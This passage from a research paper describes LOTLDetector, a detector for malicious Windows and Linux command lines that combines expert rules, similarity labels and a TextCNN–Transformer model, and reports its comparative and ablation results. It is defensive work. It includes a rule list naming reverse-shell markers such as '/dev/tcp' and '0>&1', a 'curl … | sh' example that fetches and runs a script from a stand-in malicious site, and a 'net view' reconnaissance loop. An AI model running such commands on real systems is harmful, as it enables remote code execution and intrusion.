parameter_keyword | When a parameter matches one of the predefined parameters in the ruleset, it prefixes the parameter with ’parameter’ as the return label. | parameter_–list-keys |
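A toy sketch of rule-label extraction against the three rule lists; the keyword entries below are illustrative examples taken from the text, not the real rule library:

```python
# Toy rule library with the three lists described above (illustrative only).
RULE_LIB = {
    'path':      ['/dev/tcp', '/dev/mem'],
    'command':   ['bash', 'kill'],
    'parameter': ['-i>&', '0>&1', '--list-keys'],
}

def extract_rule_labels(cmd: str) -> list:
    """Return 'kind_keyword' labels for every rule that matches the command."""
    labels = []
    for kind, keywords in RULE_LIB.items():
        for kw in keywords:
            if kw in cmd:
                labels.append(f'{kind}_{kw}')
    return labels
```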
Token extraction
Each command line consists of two parts: the executable program path and the command line arguments. For example, the command line "C:\Windows\System32\cmd.exe /c copy /y C:\Program files\appdata\local\temp\19084.bmp C:\Program files\appdata\local\temp\19084.bmp.vbs" has "C:\Windows\System32\cmd.exe" as its executable program path and "/c copy /y C:\Program files\appdata\local\temp\19084.bmp C:\Program files\appdata\local\temp\19084.bmp.vbs" as its arguments. In our view, the entire command line text is composed of different tokens, some of which may exhibit strong malicious intent, while others may be lost to incorrect parsing rules. Therefore, tokenizing the command line text to obtain a token sequence representative of the command line structure is an important task.
We use a common and efficient method for token division based on command separators (spaces and the characters '\', '.', '/', ':', ';'), which ensures that the tokens we capture are complete natural words. For example, the command "C:\Windows\System32\cmd.exe /c copy /y C:\Program files\appdata\local\temp\19084.bmp C:\Program files\appdata\local\temp\19084.bmp.vbs", after our de-obfuscation and standardization operations, becomes "c:\windows\system32\cmd.exe /c copy /y c:\program files\appdata\local\temp\number.bmp c:\program files\appdata\local\temp\number.bmp.vbs" and is then tokenized into the list ['c', 'windows', 'system32', 'cmd', 'exe', 'c', 'copy', 'y', 'c', 'program', 'files', 'appdata', 'local', 'temp', 'number', 'bmp', 'c', 'program', 'files', 'appdata', 'local', 'temp', 'number', 'bmp', 'vbs'].
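The separator-based tokenization can be sketched in a few lines; the exact separator set is our reading of the example above:

```python
import re

def tokenize(cmd: str) -> list:
    """Split a normalized command line on whitespace and the
    path/command delimiters \ . / : ; dropping empty fragments."""
    return [t for t in re.split(r'[\s\\./:;]+', cmd) if t]
```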
Similarity comparison
At the current stage, we adopt a centralized data processing method that collects all command lines identified as malicious in the training set into a dedicated malicious command line data table. This table serves as the reference standard for subsequent command-line identification and analysis. Whenever our model evaluates a new command line, it computes similarity with the BLEU score, a metric for measuring the similarity of text sequences that assesses the matching of 1-grams, 2-grams, 3-grams, and 4-grams between the input text and the reference text. The final BLEU score lies in [0, 1], where 1 indicates a perfect match (all n-grams identical) and 0 indicates no match at all. Our strategy is therefore to assign a similarity label when the similarity between the tested command line and a reference command line exceeds a certain threshold, indicating high similarity to known malicious command lines. Through sensitivity testing, we set this threshold at 80%.
By employing this method, we can effectively leverage historical data to enhance the model’s ability to identify newly emerging malicious command lines. It also provides security analysts with a tool for rapid response and handling of potential threats. This strategy not only improves the accuracy of identification but also enhances the adaptability and response speed to new types of malicious behavior.
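A minimal, self-contained sketch of the BLEU-based similarity label. This hand-rolled BLEU (clipped n-gram precisions with a brevity penalty) approximates the standard formulation rather than reproducing the authors' exact implementation:

```python
import math
from collections import Counter

def bleu(candidate: list, reference: list, max_n: int = 4) -> float:
    """Geometric mean of clipped 1..4-gram precisions times a brevity penalty."""
    precisions = []
    for n in range(1, max_n + 1):
        cand = Counter(tuple(candidate[i:i + n]) for i in range(len(candidate) - n + 1))
        ref = Counter(tuple(reference[i:i + n]) for i in range(len(reference) - n + 1))
        overlap = sum((cand & ref).values())       # clipped n-gram matches
        precisions.append(overlap / max(sum(cand.values()), 1))
    if min(precisions) == 0:
        return 0.0
    geo = math.exp(sum(math.log(p) for p in precisions) / max_n)
    bp = min(1.0, math.exp(1 - len(reference) / max(len(candidate), 1)))
    return bp * geo

def similarity_label(tokens, malicious_table, threshold=0.8):
    """Assign the label when any known-malicious entry scores above threshold."""
    return any(bleu(tokens, ref) >= threshold for ref in malicious_table)
```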
Feature encoding
In the feature extraction phase, we carefully selected and extracted a series of rule labels with the help of domain expert knowledge. These rule labels encapsulate the experts’ profound understanding and experience summary of the specific domain. To further integrate expert knowledge with deep learning technology, we adopted the Word2Vec model encoding strategy. Specifically, we input the rule labels, word tokens, and similarity labels into the Word2Vec model separately, encoding each into a 100-dimensional vector. This process not only preserves the semantic information contained in the expert knowledge but also endows it with a numerical form suitable for machine processing through the deep learning model, achieving seamless integration of expert knowledge and deep learning.
During the encoding process, we divided the command-line features into three key parts: rule label encoding, word token encoding, and similarity label encoding, and assigned each part's vector representation a weight parameter. As shown in Fig. 2, taking the command "ping www.baidu.com" as an example, token extraction splits the command into [ping www baidu com]; rule extraction matches "ping" to obtain the "command_ping" rule label; and similarity comparison with the known malicious command "ping www.baodu.com" yields high similarity and thus the similarity label. These three types of features are each encoded through word embedding into three different feature vectors. Finally, we weight and fuse the feature vectors of rule labels, word tokens, and similarity labels dimension by dimension to form a new feature vector. This new vector integrates the three feature types through weighted fusion, serves as the model input, and contains more feature information than any single vector. Moreover, the weight parameters are not fixed but are adjusted dynamically during training: the model optimizes them from training feedback, gradually finding the most suitable values for the current task across training rounds. This dynamic adjustment mechanism improves the model's utilization of expert knowledge and enhances its ability to learn complex feature relationships, providing more accurate and effective feature representations for subsequent deep learning tasks.
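The dimension-wise weighted fusion can be sketched as below; the toy 4-dimensional vectors and the fixed example weights stand in for the 100-dimensional Word2Vec embeddings and the learnable weights described above:

```python
def fuse(token_vec, rule_vec, sim_vec, w=(0.5, 0.3, 0.2)):
    """Weighted dimension-wise fusion of the three embedded feature streams.
    The weights w are placeholders for the learnable scalars tuned in training."""
    assert len(token_vec) == len(rule_vec) == len(sim_vec)
    return [w[0] * t + w[1] * r + w[2] * s
            for t, r, s in zip(token_vec, rule_vec, sim_vec)]
```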
[See PDF for image]
Fig. 2
Command line feature extraction and encoding examples
Feature learning
We constructed an effective combination model based on TextCNN and Transformer. The main reason is that TextCNN is good at extracting local features, while Transformer is good at capturing global dependencies. By combining the two, both local and global information can be utilized simultaneously, thereby improving the accuracy of classification.
The overall architecture of the classification model is shown in Fig. 3 and mainly includes five parts: Multi-feature Embedding; CNN Module; Transformer Module; Fully Connected; Classification.
Multi-feature Embedding. We process the command line text corpus through the previous method and map it to multi-feature vectors. Multi-feature embedding consists of Token2vec, Rule2vec and Similarity2vec, which integrates three layers of features and serves as the input for the subsequent neural network model.
CNN Module. TextCNN is a CNN specifically designed for text classification problems. TextCNN captures features between multiple consecutive words in continuous text sequences by using convolutional kernels of different sizes, so the CNN module is used to extract local key features in the command line sequence.
Transformer Module. We design and implement a multi-head self-attention mechanism in the LOTLDetector, which improves the model’s representation and learning ability by calculating multiple attention heads in parallel. In the multi-head self-attention mechanism, the input sequence is first linearly transformed, then divided into multiple subspaces, each of which is used to calculate an independent attention head. Each attention head has its own query (Q), key (K), and value (V) vectors. By performing a dot product operation between the query and the key, attention weights are obtained. The weights are multiplied by the value vector and summed to get the attention output for each position.
Fully Connected. In this module, we concatenate the outputs of the CNN module and the Transformer module through a fully connected layer to form a new vector.
Classification. The new vector obtained from the fully connected stage is transformed into a probability distribution through the softmax function, thereby identifying the category to which the command line belongs (benign, suspicious, and malicious). In summary, we successfully constructed a combination model of CNN and Transformer, which identifies the category of the input command line through the above five steps.
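The core of the Transformer module's attention heads, scaled dot-product attention, can be sketched in plain Python. This is one head on toy dimensions; the real model computes several heads in parallel over learned Q/K/V projections:

```python
import math

def softmax(xs):
    m = max(xs)                              # subtract max for numerical stability
    exps = [math.exp(x - m) for x in xs]
    s = sum(exps)
    return [e / s for e in exps]

def attention(Q, K, V):
    """Scaled dot-product attention for one head on plain lists:
    weights = softmax(Q.K^T / sqrt(d_k)), output = weights.V."""
    d_k = len(K[0])
    out = []
    for q in Q:
        scores = [sum(qi * ki for qi, ki in zip(q, k)) / math.sqrt(d_k) for k in K]
        w = softmax(scores)
        out.append([sum(wi * v[j] for wi, v in zip(w, V)) for j in range(len(V[0]))])
    return out
```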
[See PDF for image]
Fig. 3
Model architecture diagram
Experimental setup
Dataset
Due to the lack of publicly available datasets for command line detection, this paper combines multiple data sources to construct the dataset shown in Table 5. The data come from three sources. First, we collect data from a security company with over 8000 regular employees that serves more than 5000 enterprise users; because the data come from real customer deployment scenarios, we protect privacy by replacing relevant file names and user names with the symbol "*". Second, we construct malicious command line examples using the Metasploit (https://www.metasploit.com/), PowerSploit (https://github.com/powershellmafia/powersploit), and CobaltStrike (https://www.cobaltstrike.com) penetration tools. Third, we collect malicious command line code from GitHub (https://lolbas-project.github.io/, https://wadcoms.github.io/, https://lofl-project.github.io/). It is worth noting that we invited three security experts with over 30 years of service in the company to label and classify the data, ensuring coverage of the 14 tactical stages in ATT&CK, such as Execution, Privilege Escalation, and Exfiltration.
Since previous research on command lines has generally focused on a single platform, the resulting detectors port poorly to other platforms. We hope to create a more universally applicable model that can detect malicious command lines across multiple platforms; therefore, when collecting data, we collected command lines from both the Windows and Linux platforms.
Table 5. Detailed command line information
Platform | Normal | Suspicious | Malicious |
|---|---|---|---|
Windows | 24687 | 1370 | 1391 |
Linux | 26230 | 639 | 224 |
Table 5 shows an imbalance between attack and non-attack sequences in the training set, which arises because audit logs contain far fewer attack entities than non-attack entities. For example, in the Windows dataset we collected, there are 1,391 attack entities, 1,370 suspicious entities, and 24,687 non-attack entities. Training a classifier on such an unbalanced dataset may bias it towards the majority class (non-attack) or leave it unable to learn the minority classes (attack or suspicious). A simple balancing technique is to replicate minority-class samples or randomly delete majority-class samples; however, our initial prototype showed that this led the model to overfit specific attack patterns or miss many important non-attack patterns. Instead, LOTLDetector first undersamples non-attack sequences using a similarity threshold, then uses an oversampling mechanism to randomly mutate attack and suspicious sequences until their total matches the number of non-attack sequences. The two mechanisms are described in detail below.
Undersampling: LOTLDetector calculates the similarity between command line texts through Levenshtein distance, thereby reducing the number of non-attack samples. It measures the similarity between texts by calculating the minimum number of editing operations required to transform one string into another. The LOTLDetector uses this distance calculation method to filter out command line text sequences with similarity exceeding a set threshold. In our experiments, we found that setting a similarity threshold of 80% can achieve an appropriate undersampling ratio, effectively filtering out highly similar and redundant command line text sequences.
Oversampling: LOTLDetector uses a mutation-based oversampling mechanism to include a greater variety of attack and suspicious samples in the training dataset. The LOTLDetector randomly mutates a lexical word type into another lexical word of the same type. This process does not fundamentally change the mutated sequence; however, it increases the number of similar sequences, ensuring that the model’s training dataset remains balanced.
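The two balancing mechanisms can be sketched as follows. The Levenshtein-based undersampling mirrors the description above, while the token-level mutation in `oversample` is a simplified stand-in for the lexical-type-preserving mutation:

```python
import random

def levenshtein(a: str, b: str) -> int:
    """Minimum number of edit operations turning a into b (dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def similarity(a: str, b: str) -> float:
    return 1 - levenshtein(a, b) / max(len(a), len(b), 1)

def undersample(samples, threshold=0.8):
    """Drop any sample at least `threshold` similar to one already kept."""
    kept = []
    for s in samples:
        if all(similarity(s, k) < threshold for k in kept):
            kept.append(s)
    return kept

def oversample(samples, target, vocab):
    """Grow the minority class by mutating one token per copy (simplified)."""
    out = list(samples)
    while len(out) < target:
        tokens = random.choice(samples).split()
        i = random.randrange(len(tokens))
        tokens[i] = random.choice(vocab)  # swap in another token of the same type
        out.append(' '.join(tokens))
    return out
```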
Evaluation strategy
In our experiments, we used two evaluation strategies. The first is an intra-dataset evaluation strategy (denoted as intra-evaluation), where the model is trained on 80% of the samples in the Windows and Linux datasets and tested on the remaining 20% of the samples within the same dataset. The second is an inter-dataset evaluation strategy (denoted as inter-evaluation), where the model uses the Windows command line dataset as the training set and then tests on the Linux command line dataset, or vice versa, using the Linux command line dataset as the training set and testing on the Windows command line dataset.
To evaluate the performance of the LOTLDetector, we used four evaluation metrics: accuracy, precision, recall, and F1 score, which are standard evaluation measures for classification tasks. Additionally, since this is a multi-class classification task, the calculation method for each class i’s evaluation metrics is as follows:
Accuracy_i = (TP_i + TN_i) / (TP_i + TN_i + FP_i + FN_i) (1)
Precision_i = TP_i / (TP_i + FP_i) (2)
Recall_i = TP_i / (TP_i + FN_i) (3)
F1_i = 2 * Precision_i * Recall_i / (Precision_i + Recall_i) (4)
where TP_i represents the number of samples predicted as class i that actually are class i, TN_i represents the number of samples predicted not to be class i that actually are not class i, FP_i represents the number of samples predicted as class i whose actual class is not i, and FN_i represents the number of samples that are actually class i but are predicted not to be class i.
Evaluation experiment
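As a concrete companion to the per-class metric definitions above, a minimal computation on toy labels:

```python
def per_class_metrics(y_true, y_pred, cls):
    """Accuracy, precision, recall, and F1 for one class, following Eqs. (1)-(4)."""
    tp = sum(t == cls and p == cls for t, p in zip(y_true, y_pred))
    tn = sum(t != cls and p != cls for t, p in zip(y_true, y_pred))
    fp = sum(t != cls and p == cls for t, p in zip(y_true, y_pred))
    fn = sum(t == cls and p != cls for t, p in zip(y_true, y_pred))
    acc = (tp + tn) / len(y_true)
    prec = tp / (tp + fp) if tp + fp else 0.0
    rec = tp / (tp + fn) if tp + fn else 0.0
    f1 = 2 * prec * rec / (prec + rec) if prec + rec else 0.0
    return acc, prec, rec, f1
```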
Comparative experiment
To investigate the competitive performance of our system, we compared LOTLDetector with the following malicious command-line detection models.
Fang et al. (2021): Manually extracted features of PowerShell scripts from three aspects (text, functions, and abstract syntax trees) and used the FastText model to automatically output the encoding vectors of the scripts. These two kinds of features were then directly combined and fed into a random forest classifier for classification.
Boros et al. (2022): A set of rules is predefined through expert knowledge, and regular-expression matching is used to match each possible feature in the command line; this feature set is then used to train the classifier.
Ding et al. (2023): A word embedding model is used to project semantically similar words into approximate vectors in the embedding space with contextual word embeddings, thereby converting command line text into a word vector matrix, which is then fed into the model for learning and classification.
Ablation study
1) Evaluation of different components. In this experiment, we evaluated the performance of three key components of the LOTLDetector (de-obfuscation, rule extraction, and standardization), conducting an intra-dataset evaluation on the Windows dataset and testing a total of six schemes.
de-obfuscation: This approach involves training the model using only the deobfuscated command line text from the original command lines.
Rule Extraction: This approach involves training the model using only the extracted rule tags from the original command lines.
Standardization: This approach involves training the model using only the standardized command-line text that has been processed.
de-obfuscation + Rule Extraction: Training the model using both the de-obfuscated command line text and the extracted rule tags.
de-obfuscation + Standardization: Training the model using the command line text that has undergone both de-obfuscation and standardization processes.
Rule Extraction + Standardization: Training the model using the extracted rule tags and the standardized command line text.
2) Evaluation of different features. In this experiment, we evaluated the contribution of the three feature types (word token, rule label, and similarity label), again testing six schemes.
Word Token: This scheme directly extracts word tokens from the command line and uses the extracted word token as the only input to the model.
Rule Label: This scheme directly matches rules against the command line, extracts rule label, and uses the rule label as the only input to the model.
Similarity Label: This scheme directly compares the similarity of the command line, extracts similarity label, and uses the similarity label as the only input to the model.
Word Token + Rule Label: This scheme simultaneously extracts word token and matches rules against the command line, using both word token and rule label as inputs to the model.
Word Token + Similarity Label: This scheme simultaneously extracts word token and compares the similarity of the command line, using both word token and similarity label as inputs to the model.
Rule Label + Similarity Label: This scheme only matches rules and compares the similarity of the command line, using both rule label and similarity label as inputs to the model.
Performance Overhead
In order to evaluate the computational efficiency of LOTLDetector and ensure its feasibility in practical deployment, we assessed the performance overhead of LOTLDetector when processing different numbers of command lines on the Windows dataset.
Evaluation result
Comparative experiment
The experimental results are shown in Table 6 (intra-evaluation, the within-dataset evaluation strategy) and Table 7 (inter-evaluation, the cross-dataset evaluation strategy), where Windows->Linux indicates that the model is trained on the Windows dataset and tested on the Linux dataset, and Linux->Windows indicates the reverse. First, current work on malicious command-line detection focuses only on the abuse of whitelisted benign tools on a single platform. Boros et al. (2022) studied whitelisted system tools on the Windows operating system, while Ding et al. (2023) studied whitelisted system tools on the Linux operating system. Although these methods perform well within their respective platform datasets, they perform poorly in cross-platform detection, and the models need to be retrained for it. The LOTLDetector, by contrast, through its predefined rules and similarity tags, achieves a better F1 score than Ding et al. (2023) and Boros et al. (2022) even under the cross-dataset evaluation strategy. Second, transforming text into feature vectors through natural language processing is generally better than models based solely on predefined rules for feature engineering, as such rules rely too heavily on expert knowledge and the quality of the model then depends directly on how the rules are defined. For example, the overall performance of Ding et al. (2023) is also better than that of Boros et al. (2022) under both the within-dataset and cross-dataset evaluation strategies.
Third, Boros et al. (2022) employed a random forest model to classify the originally collected command-line data through rule extraction. However, this method did not perform de-obfuscation and standardization on the data, leading to suboptimal performance when facing complex and obfuscated command-line data. Similarly, Ding et al. (2023) approached the problem purely from the perspective of deep learning, extracting features to detect command lines, but also did not de-obfuscate the data, making it difficult for deep learning models to extract text features and thereby hurting detection. In contrast, LOTLDetector clarifies the structure of command-line text through de-obfuscation operations. On this basis, by combining predefined rules with word embedding technology from natural language processing, it significantly enhances the detection of malicious command lines. Specifically, the malicious command line rules predefined from expert knowledge effectively detect known malicious command lines, whereas word embeddings based on natural language processing, by learning the text features of existing malicious command lines, enable the detection of unknown ones. This combination achieved a high F1 score (0.9598) under the within-dataset evaluation strategy, fully demonstrating its effectiveness in detecting malicious command lines.
Fourth, although the research object of Fang et al. (2021) is PowerShell scripts, their approach to processing the scripts is to directly remove tabs and newline characters, converting the PowerShell scripts into single-line text. We also compare this method with our command-line detection system here. Since there are still certain differences in text structure between script files and command lines, we only manually extract text-level features in this case. The text-level features extracted by this system include: special variable names (such as “cmd” and “Shell”), the number of character occurrences (taking the top five most frequent characters), and URLs/IP addresses. The results show that detection methods suitable for PowerShell scripts are not necessarily suitable for command-line detection. This is because the text length of command lines is inevitably shorter than that of scripts, which makes it difficult to effectively count the number of special variable names and characters. Moreover, the complexity of the text structure of command lines is not comparable to that of PowerShell scripts, making it impossible to extract corresponding abstract syntax tree node features.
Finally, as shown in Table 6, we observed that the performance of the LOTLDetector on the Linux dataset (F1 score of 0.9727) is slightly better than that on the Windows dataset (F1 score of 0.9598). Although the performances are very close, the performance on the Linux dataset is slightly higher. We believe the reasons are as follows: Linux command lines usually have a more concise and standardized structure, while Windows command lines may contain more complex paths and parameters. This structural difference lets the model extract features more effectively from Linux command lines, improving detection accuracy. In addition, the Linux system has relatively few command-line tools with concentrated functions, while the Windows system has a wide variety of command-line tools with complex functions. This diversity increases the learning difficulty on the Windows dataset, resulting in a slight decrease in detection accuracy.
Table 6. Intra-evaluation: within dataset evaluation strategy
Dataset | Model | Accuracy | Precision | Recall | F1-Score |
|---|---|---|---|---|---|
Windows | Fang et al. (2021) | 0.8934 | 0.9074 | 0.9098 | 0.8970 |
Boros et al. (2022) | 0.8211 | 0.8186 | 0.8174 | 0.8157 | |
Ding et al. (2023) | 0.8868 | 0.8954 | 0.8866 | 0.8874 | |
LOTLDetector | 0.9598 | 0.9601 | 0.9598 | 0.9598 | |
Linux | Fang et al. (2021) | 0.9066 | 0.9067 | 0.9145 | 0.9238 |
Boros et al. (2022) | 0.9123 | 0.9145 | 0.9125 | 0.9121 | |
Ding et al. (2023) | 0.9135 | 0.9242 | 0.9140 | 0.9141 | |
LOTLDetector | 0.9728 | 0.9737 | 0.9725 | 0.9727 |
Table 7. Inter-evaluation: cross dataset evaluation strategy
Dataset | Model | Accuracy | Precision | Recall | F1-Score |
|---|---|---|---|---|---|
Windows->Linux | Fang et al. (2021) | 0.8937 | 0.5979 | 0.5023 | 0.6478 |
Boros et al. (2022) | 0.4306 | 0.4981 | 0.4362 | 0.3456 | |
Ding et al. (2023) | 0.9589 | 0.3664 | 0.3435 | 0.3424 | |
LOTLDetector | 0.9676 | 0.6592 | 0.8841 | 0.7410 | |
Linux->Windows | Fang et al. (2021) | 0.8564 | 0.5077 | 0.4187 | 0.4775 |
Boros et al. (2022) | 0.3190 | 0.2667 | 0.3467 | 0.2022 | |
Ding et al. (2023) | 0.8974 | 0.5189 | 0.3670 | 0.3773 | |
LOTLDetector | 0.8988 | 0.6367 | 0.6724 | 0.6532 |
Ablation study
1) Evaluation of different components. The experimental results are shown in Table 8. First, the combination of de-obfuscation and standardization raised the F1 score to 0.9576 compared with using either alone, further proving that their combination makes the command line text structure clearer and easier for the model to extract effective textual features. Second, regarding rule extraction, both de-obfuscation + rule extraction and rule extraction + standardization improved the F1 score to varying degrees, compensating for the shortcoming of relying solely on rule extraction, where the quality of the predefined rules limits the model's performance. Third, the results also show that relying solely on expert knowledge to detect malicious command lines has significant drawbacks: in the experiment using only rule extraction, the F1 score was just 0.8276, far below the other schemes, because the quality of the rule definitions directly determines performance. Rules defined too broadly cause alarm fatigue, while rules defined too strictly cause missed detections. Fourth, we found that de-obfuscation + rule extraction decreased overall performance compared with de-obfuscation alone, whereas de-obfuscation + standardization improved it. We attribute this to the standardization operation reducing the complexity of the command lines, enhancing the model's generalization ability, and enabling it to extract key features more effectively, thereby improving detection accuracy.
Therefore, the deobfuscation + rule extraction method, without normalization, failed to extract powerful rule tags due to the presence of too many common texts in the command lines (such as IP addresses, file paths, etc.), which affected detection accuracy. Finally, command line data that has undergone de-obfuscation, standardization, and rule extraction operations can effectively improve the model’s detection capabilities. For instance, LOTLDetector achieved an F1 score of 0.9598.
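The standardization step discussed above can be illustrated with a minimal sketch; the placeholder tokens and regular expressions here are our own assumptions for illustration, not LOTLDetector's actual rules:

```python
import re

# Hypothetical standardization: replace high-variance substrings
# (IP addresses, URLs, file paths) with fixed placeholder tokens so the
# model sees a cleaner, more general command-line structure.
PATTERNS = [
    (re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b"), "<IP>"),
    (re.compile(r"https?://\S+"), "<URL>"),
    (re.compile(r"[A-Za-z]:\\(?:[^\\\s\"']+\\)*[^\\\s\"']*"), "<WIN_PATH>"),
    (re.compile(r"(?<![\w.])/(?:[\w.-]+/)*[\w.-]+"), "<UNIX_PATH>"),
]

def standardize(cmdline: str) -> str:
    """Apply each placeholder substitution in order."""
    for pattern, token in PATTERNS:
        cmdline = pattern.sub(token, cmdline)
    return cmdline
```

For example, `standardize("curl -s http://1.2.3.4/x.sh | sh")` yields `curl -s <URL> | sh`, so two downloads that differ only in their target URL map to the same standardized form.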
Table 8. Effects of different components on the Windows dataset
Metric | De-obfuscation | Rule Extraction | Standardization | De-obfuscation + Rule Extraction | De-obfuscation + Standardization | Rule Extraction + Standardization | LOTLDetector
|---|---|---|---|---|---|---|---|
Accuracy | 0.9390 | 0.8212 | 0.9518 | 0.8644 | 0.9574 | 0.8806 | 0.9598 |
Precision | 0.9397 | 0.8185 | 0.9520 | 0.8703 | 0.9577 | 0.8855 | 0.9601 |
Recall | 0.9391 | 0.8188 | 0.9520 | 0.8643 | 0.9575 | 0.8809 | 0.9598 |
F1-Score | 0.9391 | 0.8276 | 0.9517 | 0.8660 | 0.9576 | 0.8817 | 0.9598 |
2) Evaluation of different features. The experimental results are shown in Table 9. First, word token + similarity label performs better than the word token alone. For example, integrating the similarity label into LOTLDetector increased the F1 score from 0.9552 to 0.9570, further confirming that the extracted similarity label is effective supplementary information for the word token. Word token + rule label also outperformed the word token alone, validating the effectiveness of the rule label. Second, when word token, rule label, and similarity label were used individually, the rule label and similarity label performed far worse than the word token, indicating that the word token is the most important feature in our system and that the other two features serve only as supplementary information to it. Finally, LOTLDetector outperformed word token + similarity label, indicating that where similarity labels do not provide full coverage, rule labels can supply additional information.
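The fusion of the three feature views can be sketched as simple vector concatenation; the dimensions and the concatenation strategy here are illustrative assumptions, not LOTLDetector's exact architecture:

```python
import numpy as np

def fuse_features(word_token_emb, rule_label_vec, similarity_label_vec):
    """Concatenate the three feature views into a single input vector.

    word_token_emb       : dense text embedding of the command line
    rule_label_vec       : multi-hot vector of matched expert rules
    similarity_label_vec : similarity scores against known templates

    The shapes and plain concatenation are our own illustrative choices.
    """
    return np.concatenate([
        np.asarray(word_token_emb, dtype=np.float32),
        np.asarray(rule_label_vec, dtype=np.float32),
        np.asarray(similarity_label_vec, dtype=np.float32),
    ])
```

With a hypothetical 300-dimensional text embedding, 3 rule flags, and 1 similarity score, the fused vector has 304 dimensions and can be fed to any downstream classifier.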
Table 9. Experimental effects of different input features
Metric | Word Token | Rule Label | Similarity Label | Word Token + Rule Label | Word Token + Similarity Label | Rule Label + Similarity Label | LOTLDetector
|---|---|---|---|---|---|---|---|
Accuracy | 0.9551 | 0.3132 | 0.3397 | 0.9563 | 0.9569 | 0.3397 | 0.9598 |
Precision | 0.9551 | 0.1815 | 0.1132 | 0.9565 | 0.9570 | 0.1132 | 0.9601 |
Recall | 0.9554 | 0.3083 | 0.3333 | 0.9564 | 0.9571 | 0.3333 | 0.9598 |
F1-Score | 0.9552 | 0.2051 | 0.1690 | 0.9564 | 0.9570 | 0.1690 | 0.9598 |
Figure 4 shows the ROC curves of the above six methods on the Windows dataset. The X-axis represents the FPR (False Positive Rate) and the Y-axis the TPR (True Positive Rate); the closer a curve is to the upper-left corner, the better the model's performance. First, the figure shows that when word tokens alone are used as the model's input, performance is much higher than when rule labels or similarity labels are used individually, highlighting the importance of the word token feature. Second, when word tokens are combined with rule labels and similarity labels, performance improves further to varying degrees, indicating that rule labels and similarity labels supplement information that word tokens alone miss.
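For readers reproducing such curves, the (FPR, TPR) points can be computed with a short threshold sweep; this is a generic sketch, not the exact evaluation code used in our experiments:

```python
import numpy as np

def roc_points(scores, labels):
    """Compute (FPR, TPR) pairs by sweeping a threshold over the scores.

    scores: predicted probability of the malicious class
    labels: ground truth (1 = malicious, 0 = benign)
    """
    order = np.argsort(scores)[::-1]       # rank samples by descending score
    labels = np.asarray(labels)[order]
    tp = np.cumsum(labels)                 # true positives at each cutoff
    fp = np.cumsum(1 - labels)             # false positives at each cutoff
    tpr = tp / max(labels.sum(), 1)
    fpr = fp / max((1 - labels).sum(), 1)
    return fpr, tpr

def auc(fpr, tpr):
    # Trapezoidal area under the ROC curve.
    return float(np.sum((fpr[1:] - fpr[:-1]) * (tpr[1:] + tpr[:-1]) / 2.0))
```

A classifier that ranks every malicious sample above every benign one traces the upper-left corner and scores an AUC of 1.0.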
Fig. 4
ROC curves of different input features
Performance Overhead
The experimental results show that the testing time of LOTLDetector increases linearly with the number of command lines, indicating that the model has good time complexity when handling large-scale data (Fig. 5a). Specifically, processing 13,000 command lines takes about 100 min, which is acceptable in a real-time detection system. In addition, the average memory utilization of LOTLDetector is 559 MB, with no trend of continuous growth as the data volume increases (Fig. 5b), indicating that the model is efficient in resource consumption and will not cause significant system performance degradation. Finally, based on these results, LOTLDetector is expected to behave as follows in resource-constrained environments: first, its linear time complexity enables stable, continuous real-time processing of large-scale command-line data; second, during execution, CPU utilization can be kept below 20% and memory consumption remains stable, which both ensures that the SIEM system can efficiently complete its core tasks of event analysis and alert response, and prevents overall system efficiency from being degraded by excessive model resource consumption.
Fig. 5
The impact of different numbers of command lines on the performance of LOTLDetector
Discussion and future work
The experimental results show that LOTLDetector is capable of handling command-line data from both Windows and Linux platforms, which makes the model widely applicable in multi-operating system environments. By training and testing on datasets from different platforms, the model is able to effectively identify malicious command-line attacks. Through the integration of expert rules and deep learning techniques, the model achieves high-precision detection of malicious command lines and enhances detection performance through multi-layer deobfuscation algorithms and feature fusion. However, LOTLDetector can be further improved in the following two aspects.
The context of the command line environment. We have observed that many command lines used for malicious purposes are also used by ordinary users, but for different ends. For example, the command "curl -s https://malicious-site.com/malicious.sh | sh" downloads a script from a website and executes it. Because we categorized this pattern as "suspicious" during training, our model will, at its current stage, also classify "curl -s https://benign-site.com/benign.sh | sh" as suspicious due to the lack of command-line context, even though the user is simply downloading a legitimate software installation script. For this reason, our work defines a "suspicious" class of commands: commands that are benign in themselves but are often executed before malicious activity begins. Take the "net view" command as an example. It is a Windows system command used to view computer resources on the network. However, if the logs show that "net view" is followed by "for /f %i in (’net view /domain’) do net view %i", the intent is to collect sensitive information on the network, such as shared folders, printers, or other resources, which suggests that unauthorized network scanning or information collection may be occurring prior to lateral movement. Viewed alone, "net view" is benign; analyzed in context, it can be judged malicious. Currently, due to the limitations of our existing datasets, we cannot provide the model with complete command-line context for training, and therefore cannot make fine-grained categorical judgments about such command lines based on specific context. This lack of command-line context is a limitation of our system.
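A context-aware check of the kind described above could be sketched as follows; the window size and the matching patterns are hypothetical examples, not rules from our system:

```python
# Hypothetical context rule: "net view" alone is benign, but "net view"
# followed shortly by a for-loop that re-runs it against every discovered
# host suggests reconnaissance before lateral movement.
def flag_recon_sequence(command_log):
    """command_log: list of command lines in execution order.

    Returns True when a "net view" is followed within a small window by
    an enumeration loop over its output; the window of 3 is an assumption.
    """
    for i, cmd in enumerate(command_log):
        if "net view" in cmd:
            window = command_log[i + 1:i + 4]
            if any("for /f" in c and "net view" in c for c in window):
                return True
    return False
```

The same idea generalizes to other benign-looking commands whose malicious intent only emerges from the surrounding sequence.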
In the future, our plans center on Large Language Models (LLMs): by transforming the hierarchical relationships of process trees or user behavior logs into semantic text that LLMs can parse, we can use their reasoning capabilities to trace the source chain of processes and automatically generate natural language explanations. In this way, process trees and user behavior logs become effective contextual semantic information, which not only addresses the current model's lack of context but also further enhances the interpretability of model decisions, helping analysts understand more intuitively the background and risk logic of suspicious command lines.
